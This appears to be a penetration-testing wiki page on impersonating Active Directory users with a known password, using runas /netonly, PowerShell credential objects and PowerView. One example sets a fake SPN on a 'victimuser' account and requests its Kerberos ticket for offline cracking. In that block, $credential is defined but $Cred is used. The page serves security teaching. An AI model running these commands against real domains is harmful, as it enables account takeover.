Impersonation
- plaintext password: the techniques listed below
RunAs
Powershell
PowerView
RunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the
/netonly
flag must be set to indicate the credentials are to be used for remote access only.runas /netonly /user:$DOMAIN\$USER "powershell.exe"
Since the password cannot be supplied as an argument, the session must be interactive.
In Powershell, it is possible to impersonate a user by create a credential object and supplying it with the
-Credential
argument in the next command.# Credential object creation (prompted)
$credential = Get-Credential
# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
# Usage
Start-Process Notepad.exe -Credential $credential
Most of PowerView's functions have the
-Credential
, -Domain
and -Server
parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous "Powershell" tab, the -Credential option has to be supplied with a credential object.# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
# Usage
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl
SharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).
.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all
Last modified 1yr ago